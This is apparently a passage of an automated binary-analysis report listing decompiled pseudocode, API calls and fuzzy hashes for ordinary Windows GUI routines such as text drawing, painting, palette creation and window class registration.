                                                                        				if(_t53 != 0 && E00449E5C(_t135) != 0) {
                                                                        					if((_t117 & 0x00000000) != 0) {
                                                                        						__eflags = (_t117 & 0x00000002) - 2;
                                                                        						if((_t117 & 0x00000002) == 2) {
                                                                        							_t117 = _t117 & 0xfffffffd;
                                                                        							__eflags = _t117;
                                                                        						}
                                                                        					} else {
                                                                        						_t117 = _t117 & 0xffffffff | 0x00000002;
                                                                        					}
                                                                        					_t117 = _t117 | 0x00020000;
                                                                        				}
                                                                        				E004043E0( &_v16, _v12);
                                                                        				if((_t117 & 0x00000004) == 0) {
                                                                        					L12:
                                                                        					E00404744(_v16, 0x446bc4);
                                                                        					if(_t153 != 0) {
                                                                        						E0041FD6C( *((intOrPtr*)(_v8 + 0x14)), _t120, 1, _t135, _t143, __eflags);
                                                                        						__eflags =  *((char*)(_t139 + 0x3a));
                                                                        						if( *((char*)(_t139 + 0x3a)) != 0) {
                                                                        							_t136 =  *((intOrPtr*)(_v8 + 0xc));
                                                                        							__eflags = E0041F724( *((intOrPtr*)(_v8 + 0xc))) |  *0x446bc8;
                                                                        							E0041F730( *((intOrPtr*)(_v8 + 0xc)), E0041F724( *((intOrPtr*)(_v8 + 0xc))) |  *0x446bc8, _t136, _t139, _t143);
                                                                        						}
                                                                        						__eflags =  *((char*)(_t139 + 0x39));
                                                                        						if( *((char*)(_t139 + 0x39)) != 0) {
                                                                        							L24:
                                                                        							_t63 = E00404600(_v16);
                                                                        							_t65 = E004047F8(_v16);
                                                                        							DrawTextA(E00420730(_v8), _t65, _t63, _a12, _t117);
                                                                        							L25:
                                                                        							_pop(_t127);
                                                                        							 *[fs:eax] = _t127;
                                                                        							_push(0x446ba7);
                                                                        							return E00404348( &_v16);
                                                                        						} else {
                                                                        							__eflags = _a8;
                                                                        							if(_a8 == 0) {
                                                                        								OffsetRect(_a12, 1, 1);
                                                                        								E0041F464( *((intOrPtr*)(_v8 + 0xc)), 0x80000014);
                                                                        								_t89 = E00404600(_v16);
                                                                        								_t91 = E004047F8(_v16);
                                                                        								DrawTextA(E00420730(_v8), _t91, _t89, _a12, _t117);
                                                                        								OffsetRect(_a12, 0xffffffff, 0xffffffff);
                                                                        							}
                                                                        							__eflags = _a8;
                                                                        							if(_a8 == 0) {
                                                                        								L23:
                                                                        								E0041F464( *((intOrPtr*)(_v8 + 0xc)), 0x80000010);
                                                                        							} else {
                                                                        								_t76 = E0041EFA4(0x8000000d);
                                                                        								_t78 = E0041EFA4(0x80000010);
                                                                        								__eflags = _t76 - _t78;
                                                                        								if(_t76 != _t78) {
                                                                        									goto L23;
                                                                        								}
                                                                        								E0041F464( *((intOrPtr*)(_v8 + 0xc)), 0x80000014);
                                                                        							}
                                                                        							goto L24;
                                                                        						}
                                                                        					}
                                                                        					if((_t117 & 0x00000004) == 0) {
                                                                        						asm("movsd");
                                                                        						asm("movsd");
                                                                        						asm("movsd");
                                                                        						asm("movsd");
                                                                        						_v32.top = _v32.top + 4;
                                                                        						DrawEdge(E00420730(_v8),  &_v32, 6, 2);
                                                                        					}
                                                                        					goto L25;
                                                                        				} else {
                                                                        					if(_v16 == 0) {
                                                                        						L11:
                                                                        						E00404608( &_v16, 0x446bb8);
                                                                        						goto L12;
                                                                        					}
                                                                        					if( *_v16 != 0x26) {
                                                                        						goto L12;
                                                                        					}
                                                                        					_t153 =  *((char*)(_v16 + 1));
                                                                        					if(_t153 != 0) {
                                                                        						goto L12;
                                                                        					}
                                                                        					goto L11;
                                                                        				}
                                                                        			}


                                                                        APIs
                                                                        • DrawEdge.USER32(00000000,?,00000006,00000002), ref: 00446A8B
                                                                        • OffsetRect.USER32(?,00000001,00000001), ref: 00446ADC
                                                                        • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00446B11
                                                                        • OffsetRect.USER32(?,000000FF,000000FF), ref: 00446B1E
                                                                        • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00446B85
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Draw$OffsetRectText$Edge
                                                                        • String ID:
                                                                        • API String ID: 3610532707-0
                                                                        • Opcode ID: 85062a5ebc0655283848f6502ddf073e01523f4b758b7f32a43d0701a49e740e
                                                                        • Instruction ID: 6b641bb0bc6ef2255d17c86df0a205ba80bac31eaa022483ee7a4ef997933482
                                                                        • Opcode Fuzzy Hash: 85062a5ebc0655283848f6502ddf073e01523f4b758b7f32a43d0701a49e740e
                                                                        • Instruction Fuzzy Hash: 9E516770A006446FEB10EBA9C881B9F77E5DF46314F15816AF914F7391C73CAD418B1A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 77%
                                                                        			E0042B85C(intOrPtr* __eax, void* __ebx, signed int __ecx, struct tagRECT* __edx, void* __edi, void* __esi) {
                                                                        				char _v8;
                                                                        				int _t40;
                                                                        				CHAR* _t42;
                                                                        				int _t54;
                                                                        				CHAR* _t56;
                                                                        				int _t65;
                                                                        				CHAR* _t67;
                                                                        				intOrPtr* _t76;
                                                                        				intOrPtr _t86;
                                                                        				struct tagRECT* _t91;
                                                                        				signed int _t93;
                                                                        				int _t94;
                                                                        				intOrPtr _t97;
                                                                        				signed int _t104;
                                                                        
                                                                        				_push(0);
                                                                        				_t93 = __ecx;
                                                                        				_t91 = __edx;
                                                                        				_t76 = __eax;
                                                                        				_push(_t97);
                                                                        				_push(0x42b9b2);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t97;
                                                                        				 *((intOrPtr*)( *__eax + 0x90))();
                                                                        				if((__ecx & 0x00000400) != 0 && (_v8 == 0 ||  *((char*)(__eax + 0x170)) != 0 &&  *_v8 == 0x26 &&  *((char*)(_v8 + 1)) == 0)) {
                                                                        					E00404608( &_v8, 0x42b9c8);
                                                                        				}
                                                                        				if( *((char*)(_t76 + 0x170)) == 0) {
                                                                        					_t104 = _t93;
                                                                        				}
                                                                        				_t94 = E00438890(_t76, _t93, _t104);
                                                                        				E0042062C( *((intOrPtr*)(_t76 + 0x160)));
                                                                        				if( *((intOrPtr*)( *_t76 + 0x50))() != 0) {
                                                                        					_t40 = E00404600(_v8);
                                                                        					_t42 = E004047F8(_v8);
                                                                        					DrawTextA(E00420730( *((intOrPtr*)(_t76 + 0x160))), _t42, _t40, _t91, _t94);
                                                                        				} else {
                                                                        					OffsetRect(_t91, 1, 1);
                                                                        					E0041F464( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x160)) + 0xc)), 0x80000014);
                                                                        					_t54 = E00404600(_v8);
                                                                        					_t56 = E004047F8(_v8);
                                                                        					DrawTextA(E00420730( *((intOrPtr*)(_t76 + 0x160))), _t56, _t54, _t91, _t94);
                                                                        					OffsetRect(_t91, 0xffffffff, 0xffffffff);
                                                                        					E0041F464( *((intOrPtr*)( *((intOrPtr*)(_t76 + 0x160)) + 0xc)), 0x80000010);
                                                                        					_t65 = E00404600(_v8);
                                                                        					_t67 = E004047F8(_v8);
                                                                        					DrawTextA(E00420730( *((intOrPtr*)(_t76 + 0x160))), _t67, _t65, _t91, _t94);
                                                                        				}
                                                                        				_pop(_t86);
                                                                        				 *[fs:eax] = _t86;
                                                                        				_push(0x42b9b9);
                                                                        				return E00404348( &_v8);
                                                                        			}


















                                                                        APIs
                                                                        • OffsetRect.USER32(?,00000001,00000001), ref: 0042B8F6
                                                                        • DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0042B92E
                                                                        • OffsetRect.USER32(?,000000FF,000000FF), ref: 0042B938
                                                                        • DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0042B970
                                                                        • DrawTextA.USER32(00000000,00000000,00000000,?,00000000), ref: 0042B997
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: DrawText$OffsetRect
                                                                        • String ID:
                                                                        • API String ID: 1886049697-0
                                                                        • Opcode ID: 662b6b3a40582923ac273cb24c9d502d2feb4a56df99f8a9edd9d85c2ba6a157
                                                                        • Instruction ID: 1d1b475f9fabfd745f91b6a763abeaaa6df454c933534dc2db13d73f98644ccc
                                                                        • Opcode Fuzzy Hash: 662b6b3a40582923ac273cb24c9d502d2feb4a56df99f8a9edd9d85c2ba6a157
                                                                        • Instruction Fuzzy Hash: 91318470B04214AFDB11FB69DC85B8B77E9EF45314F5140BAF908EB292CB79AD009768
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 85%
                                                                        			E0043A97C(intOrPtr* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                        				intOrPtr* _v8;
                                                                        				intOrPtr _v12;
                                                                        				int _v16;
                                                                        				int _v20;
                                                                        				struct tagPAINTSTRUCT _v84;
                                                                        				intOrPtr _t55;
                                                                        				void* _t64;
                                                                        				struct HDC__* _t75;
                                                                        				intOrPtr _t84;
                                                                        				void* _t95;
                                                                        				void* _t96;
                                                                        				void* _t98;
                                                                        				void* _t100;
                                                                        				void* _t101;
                                                                        				intOrPtr _t102;
                                                                        
                                                                        				_t100 = _t101;
                                                                        				_t102 = _t101 + 0xffffffb0;
                                                                        				_v12 = __edx;
                                                                        				_v8 = __eax;
                                                                        				_t75 =  *(_v12 + 4);
                                                                        				if(_t75 == 0) {
                                                                        					_t75 = BeginPaint(E0043CC2C(_v8),  &_v84);
                                                                        				}
                                                                        				_push(_t100);
                                                                        				_push(0x43aa9c);
                                                                        				_push( *[fs:edx]);
                                                                        				 *[fs:edx] = _t102;
                                                                        				if( *((intOrPtr*)(_v8 + 0x198)) != 0) {
                                                                        					_v20 = SaveDC(_t75);
                                                                        					_v16 = 2;
                                                                        					_t95 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x198)) + 8)) - 1;
                                                                        					if(_t95 >= 0) {
                                                                        						_t96 = _t95 + 1;
                                                                        						_t98 = 0;
                                                                        						do {
                                                                        							_t64 = E00414208( *((intOrPtr*)(_v8 + 0x198)), _t98);
                                                                        							if( *((char*)(_t64 + 0x57)) != 0 || ( *(_t64 + 0x1c) & 0x00000010) != 0 && ( *(_t64 + 0x51) & 0x00000004) == 0) {
                                                                        								if(( *(_t64 + 0x50) & 0x00000040) == 0) {
                                                                        									goto L11;
                                                                        								} else {
                                                                        									_v16 = ExcludeClipRect(_t75,  *(_t64 + 0x40),  *(_t64 + 0x44),  *(_t64 + 0x40) +  *((intOrPtr*)(_t64 + 0x48)),  *(_t64 + 0x44) +  *((intOrPtr*)(_t64 + 0x4c)));
                                                                        									if(_v16 != 1) {
                                                                        										goto L11;
                                                                        									}
                                                                        								}
                                                                        							} else {
                                                                        								goto L11;
                                                                        							}
                                                                        							goto L12;
                                                                        							L11:
                                                                        							_t98 = _t98 + 1;
                                                                        							_t96 = _t96 - 1;
                                                                        						} while (_t96 != 0);
                                                                        					}
                                                                        					L12:
                                                                        					if(_v16 != 1) {
                                                                        						 *((intOrPtr*)( *_v8 + 0xb8))();
                                                                        					}
                                                                        					RestoreDC(_t75, _v20);
                                                                        				} else {
                                                                        					 *((intOrPtr*)( *_v8 + 0xb8))();
                                                                        				}
                                                                        				E0043AAD8(_v8, 0, _t75);
                                                                        				_pop(_t84);
                                                                        				 *[fs:eax] = _t84;
                                                                        				_push(0x43aaa3);
                                                                        				_t55 = _v12;
                                                                        				if( *((intOrPtr*)(_t55 + 4)) == 0) {
                                                                        					return EndPaint(E0043CC2C(_v8),  &_v84);
                                                                        				}
                                                                        				return _t55;
                                                                        			}



















                                                                        APIs
                                                                        • BeginPaint.USER32(00000000,?), ref: 0043A9A2
                                                                        • SaveDC.GDI32(?), ref: 0043A9D6
                                                                        • ExcludeClipRect.GDI32(?,?,?,?,?,?), ref: 0043AA38
                                                                        • RestoreDC.GDI32(?,?), ref: 0043AA62
                                                                        • EndPaint.USER32(00000000,?,0043AAA3), ref: 0043AA96
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                        • String ID:
                                                                        • API String ID: 3808407030-0
                                                                        • Opcode ID: bcb94933bbd514e23755092639edfe76ed206f93f385ce7b87eca1fef675e24f
                                                                        • Instruction ID: 981de1faad7e270c48b42c82777b4bfcd2244b1cbce74977eaa2f3e787f6203c
                                                                        • Opcode Fuzzy Hash: bcb94933bbd514e23755092639edfe76ed206f93f385ce7b87eca1fef675e24f
                                                                        • Instruction Fuzzy Hash: 70417F71A002049FDB00EF99C984FAEB7F9EF4C304F2590AAE544AB362D7399D51CB19
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 79%
                                                                        			E00467AF0(void* __ecx, void* __edx, void* __eflags, signed int _a4, char _a8, void* _a12) {
                                                                        				struct tagRECT _v20;
                                                                        				void* __edi;
                                                                        				void* __ebp;
                                                                        				int _t17;
                                                                        				CHAR* _t19;
                                                                        				int _t31;
                                                                        				CHAR* _t33;
                                                                        				int _t43;
                                                                        				CHAR* _t45;
                                                                        				void* _t49;
                                                                        				signed int _t56;
                                                                        				int _t57;
                                                                        				void* _t61;
                                                                        
                                                                        				asm("movsd");
                                                                        				asm("movsd");
                                                                        				asm("movsd");
                                                                        				asm("movsd");
                                                                        				_t60 = __ecx;
                                                                        				_t49 = __edx;
                                                                        				_t56 = _a4;
                                                                        				E0041FD6C( *((intOrPtr*)(__edx + 0x14)), __ecx, 1, _t56, _t61, __eflags);
                                                                        				if(_a8 != 1) {
                                                                        					_t57 = _t56 | 0x00000005;
                                                                        					__eflags = _t57;
                                                                        					_t17 = E00404600(__ecx);
                                                                        					_t19 = E004047F8(__ecx);
                                                                        					return DrawTextA(E00420730(_t49), _t19, _t17,  &_v20, _t57);
                                                                        				}
                                                                        				OffsetRect( &_v20, 1, 1);
                                                                        				E0041F464( *((intOrPtr*)(_t49 + 0xc)), 0x80000014);
                                                                        				_t31 = E00404600(_t60);
                                                                        				_t33 = E004047F8(_t60);
                                                                        				DrawTextA(E00420730(_t49), _t33, _t31,  &_v20, _t56 | 0x00000005);
                                                                        				OffsetRect( &_v20, 0xffffffff, 0xffffffff);
                                                                        				E0041F464( *((intOrPtr*)(_t49 + 0xc)), 0x80000010);
                                                                        				_t43 = E00404600(_t60);
                                                                        				_t45 = E004047F8(_t60);
                                                                        				return DrawTextA(E00420730(_t49), _t45, _t43,  &_v20, _t56 | 0x00000005);
                                                                        			}

















                                                                        APIs
                                                                        • OffsetRect.USER32(?,00000001,00000001), ref: 00467B26
                                                                        • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00467B5A
                                                                        • OffsetRect.USER32(?,000000FF,000000FF), ref: 00467B67
                                                                        • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00467B99
                                                                        • DrawTextA.USER32(00000000,00000000,00000000,?,?), ref: 00467BC0
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: DrawText$OffsetRect
                                                                        • String ID:
                                                                        • API String ID: 1886049697-0
                                                                        • Opcode ID: 517bd8bbddc09e6c71355e403379eb6c13af3cf851ab790c957bc1cec8c4ab7e
                                                                        • Instruction ID: 216688b682b8187a4d0dd2772e2fd5db348bcfabf5300b79facba910a8da82e7
                                                                        • Opcode Fuzzy Hash: 517bd8bbddc09e6c71355e403379eb6c13af3cf851ab790c957bc1cec8c4ab7e
                                                                        • Instruction Fuzzy Hash: 5921A4B1B0412967CB00FB6A9C81E9F72AD9F45328B11053EB918F7282DA7DE80547AD
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E0045620C(void* __eax, void* __ecx, struct HWND__** __edx) {
                                                                        				intOrPtr _t11;
                                                                        				intOrPtr _t20;
                                                                        				void* _t30;
                                                                        				void* _t31;
                                                                        				void* _t33;
                                                                        				struct HWND__** _t34;
                                                                        				struct HWND__* _t35;
                                                                        				struct HWND__* _t36;
                                                                        
                                                                        				_t31 = __ecx;
                                                                        				_t34 = __edx;
                                                                        				_t33 = __eax;
                                                                        				_t30 = 0;
                                                                        				_t11 =  *((intOrPtr*)(__edx + 4));
                                                                        				if(_t11 < 0x100 || _t11 > 0x108) {
                                                                        					L16:
                                                                        					return _t30;
                                                                        				} else {
                                                                        					_t35 = GetCapture();
                                                                        					if(_t35 != 0) {
                                                                        						if(GetWindowLongA(_t35, 0xfffffffa) ==  *0x496714 && SendMessageA(_t35, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
                                                                        							_t30 = 1;
                                                                        						}
                                                                        						goto L16;
                                                                        					}
                                                                        					_t36 =  *_t34;
                                                                        					_t2 = _t33 + 0x44; // 0x0
                                                                        					_t20 =  *_t2;
                                                                        					if(_t20 == 0 || _t36 !=  *((intOrPtr*)(_t20 + 0x254))) {
                                                                        						L7:
                                                                        						if(E004334C0(_t36, _t31) == 0 && _t36 != 0) {
                                                                        							_t36 = GetParent(_t36);
                                                                        							goto L7;
                                                                        						}
                                                                        						if(_t36 == 0) {
                                                                        							_t36 =  *_t34;
                                                                        						}
                                                                        						goto L11;
                                                                        					} else {
                                                                        						_t36 = E0043CC2C(_t20);
                                                                        						L11:
                                                                        						if(SendMessageA(_t36, _t34[1] + 0xbc00, _t34[2], _t34[3]) != 0) {
                                                                        							_t30 = 1;
                                                                        						}
                                                                        						goto L16;
                                                                        					}
                                                                        				}
                                                                        			}












                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: MessageSend$CaptureLongWindow
                                                                        • String ID:
                                                                        • API String ID: 1158686931-0
                                                                        • Opcode ID: 2c61457dadbb28cc4cbfb1fc24bd67136bca18c6d6d1ca2828e17c3f3b137a56
                                                                        • Instruction ID: 5d2c23152084b1fa4b612b1933836b5cb434e24660daf083a54e060d56ea4212
                                                                        • Opcode Fuzzy Hash: 2c61457dadbb28cc4cbfb1fc24bd67136bca18c6d6d1ca2828e17c3f3b137a56
                                                                        • Instruction Fuzzy Hash: 351181712046095FDA20BA99C980E5373DCDB25315F5204BAFD5AD7353EB2DFC084768
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00424C34(int __eax) {
                                                                        				int _t21;
                                                                        				signed int _t29;
                                                                        				char _t34;
                                                                        				int _t42;
                                                                        				int _t43;
                                                                        				struct HDC__* _t44;
                                                                        				intOrPtr _t45;
                                                                        
                                                                        				_t21 = __eax;
                                                                        				_t42 = __eax;
                                                                        				_t45 =  *((intOrPtr*)(__eax + 0x28));
                                                                        				if( *((char*)(__eax + 0x30)) == 0 &&  *(_t45 + 0x10) == 0 &&  *((intOrPtr*)(_t45 + 0x14)) != 0) {
                                                                        					_t22 =  *((intOrPtr*)(_t45 + 0x14));
                                                                        					if( *((intOrPtr*)(_t45 + 0x14)) ==  *((intOrPtr*)(_t45 + 8))) {
                                                                        						E004235B4(_t22);
                                                                        					}
                                                                        					_t21 = E00421218( *((intOrPtr*)(_t45 + 0x14)), 1 <<  *(_t45 + 0x3e));
                                                                        					_t43 = _t21;
                                                                        					 *(_t45 + 0x10) = _t43;
                                                                        					if(_t43 == 0) {
                                                                        						_t44 = E00420B28(GetDC(0));
                                                                        						if( *((char*)(_t45 + 0x71)) != 0) {
                                                                        							L9:
                                                                        							_t34 = 1;
                                                                        						} else {
                                                                        							_t29 = GetDeviceCaps(_t44, 0xc);
                                                                        							if(_t29 * GetDeviceCaps(_t44, 0xe) < ( *(_t45 + 0x2a) & 0x0000ffff) * ( *(_t45 + 0x28) & 0x0000ffff)) {
                                                                        								goto L9;
                                                                        							} else {
                                                                        								_t34 = 0;
                                                                        							}
                                                                        						}
                                                                        						 *((char*)(_t45 + 0x71)) = _t34;
                                                                        						if(_t34 != 0) {
                                                                        							 *(_t45 + 0x10) = CreateHalftonePalette(_t44);
                                                                        						}
                                                                        						_t21 = ReleaseDC(0, _t44);
                                                                        						if( *(_t45 + 0x10) == 0) {
                                                                        							 *((char*)(_t42 + 0x30)) = 1;
                                                                        							return _t21;
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t21;
                                                                        			}











                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 00424C8A
                                                                        • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00424C9F
                                                                        • GetDeviceCaps.GDI32(00000000,0000000E), ref: 00424CA9
                                                                        • CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,0042378B,00000000,00423817), ref: 00424CCD
                                                                        • ReleaseDC.USER32 ref: 00424CD8
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CapsDevice$CreateHalftonePaletteRelease
                                                                        • String ID:
                                                                        • API String ID: 2404249990-0
                                                                        • Opcode ID: 86355cff44342249c003d187886de4a42cc00f14a0457bd8da80f5da28ea72f8
                                                                        • Instruction ID: b38cbdc5d7d635c132f023a64b9ee6869dab09140c7ce5dbab682903523af89d
                                                                        • Opcode Fuzzy Hash: 86355cff44342249c003d187886de4a42cc00f14a0457bd8da80f5da28ea72f8
                                                                        • Instruction Fuzzy Hash: 8611A2217026799ADB20EF2AE4417EA3AD0EF91359F420126F9009B781D7B89994C3A9
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 88%
                                                                        			E00453968(void* __eax) {
                                                                        				void* _t16;
                                                                        				void* _t39;
                                                                        				signed int _t42;
                                                                        
                                                                        				_t16 = __eax;
                                                                        				_t39 = __eax;
                                                                        				if(( *(__eax + 0x1c) & 0x00000010) == 0 &&  *0x47aafc != 0) {
                                                                        					_t16 = E0043CF30(__eax);
                                                                        					if(_t16 != 0) {
                                                                        						_t42 = GetWindowLongA(E0043CC2C(_t39), 0xffffffec);
                                                                        						if( *((char*)(_t39 + 0x2e0)) != 0 ||  *((char*)(_t39 + 0x2e2)) != 0) {
                                                                        							if((_t42 & 0x00080000) == 0) {
                                                                        								SetWindowLongA(E0043CC2C(_t39), 0xffffffec, _t42 | 0x00080000);
                                                                        							}
                                                                        							return  *0x47aafc(E0043CC2C(_t39),  *((intOrPtr*)(_t39 + 0x2e4)),  *((intOrPtr*)(_t39 + 0x2e1)),  *0x0047AB80 |  *0x0047AB88);
                                                                        						} else {
                                                                        							SetWindowLongA(E0043CC2C(_t39), 0xffffffec, _t42 & 0xfff7ffff);
                                                                        							return RedrawWindow(E0043CC2C(_t39), 0, 0, 0x485);
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				return _t16;
                                                                        			}







                                                                        APIs
                                                                        • GetWindowLongA.USER32 ref: 0045399C
                                                                        • SetWindowLongA.USER32 ref: 004539CE
                                                                        • SetLayeredWindowAttributes.USER32(00000000,?,?,00000000,00000000,000000EC,?,?,004515D4), ref: 00453A08
                                                                        • SetWindowLongA.USER32 ref: 00453A21
                                                                        • RedrawWindow.USER32(00000000,00000000,00000000,00000485,00000000,000000EC,00000000,00000000,000000EC,?,?,004515D4), ref: 00453A37
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.749503743.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000002.00000002.749483060.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749763098.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749779338.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749823728.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749839062.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000002.00000002.749850256.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Window$Long$AttributesLayeredRedraw
                                                                        • String ID:
                                                                        • API String ID: 1758778077-0
                                                                        • Opcode ID: 700f3ffec6371fcf2b6deb768aaa2d0c978f9b693a7dd5c57a867edddd3ceee4
                                                                        • Instruction ID: f4d5327cf6d9d13d20f65eb046940501b950165327f161f479efa226d41080df
                                                                        • Opcode Fuzzy Hash: 700f3ffec6371fcf2b6deb768aaa2d0c978f9b693a7dd5c57a867edddd3ceee4
                                                                        • Instruction Fuzzy Hash: 6911AB60A042902AEB10BE794CC9B4B3A494B09356F142D7ABD99EB2C3C67CCC49C76D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 93%
                                                                        			E0041D31C(intOrPtr _a4, short _a6, intOrPtr _a8) {
                                                                        				struct _WNDCLASSA _v44;
                                                                        				struct HINSTANCE__* _t6;
                                                                        				CHAR* _t8;
                                                                        				struct HINSTANCE__* _t9;
                                                                        				int _t10;
                                                                        				void* _t11;
                                                                        				struct HINSTANCE__* _t13;
                                                                        				CHAR* _t14;
                                                                        				struct HINSTANCE__* _t19;
                                                                        				CHAR* _t20;
                                                                        				struct HWND__* _t22;
                                                                        
                                                                        				_t6 =  *0x496714; // 0x400000
                                                                        				 *0x47a4d0 = _t6;
                                                                        				_t8 =  *0x47a4e4; // 0x41d30c
                                                                        				_t9 =  *0x496714; // 0x400000
                                                                        				_t10 = GetClassInfoA(_t9, _t8,  &_v44);
                                                                        				asm("sbb eax, eax");
                                                                        				_t11 = _t10 + 1;
                                                                        				if(_t11 == 0 || L00406D8C != _v44.lpfnWndProc) {
                                                                        					if(_t11 != 0) {
                                                                        						_t19 =  *0x496714; // 0x400000
                                                                        						_t20 =  *0x47a4e4; // 0x41d30c
                                                                        						UnregisterClassA(_t20, _t19);
                                                                        					}
                                                                        					RegisterClassA(0x47a4c0);
                                                                        				}
                                                                        				_t13 =  *0x496714; // 0x400000
                                                                        				_t14 =  *0x47a4e4; // 0x41d30c
                                                                        				_t22 = CreateWindowExA(0x80, _t14, 0x41d3cc, 0x80000000, 0, 0, 0, 0, 0, 0, _t13, 0);
                                                                        				if(_a6 != 0) {
                                                                        					SetWindowLongA(_t22, 0xfffffffc, E0041D260(_a4, _a8));
                                                                        				}
                                                                        				return _t22;
                                                                        			}















                                                                        APIs
                                                                        Memory Dump Source
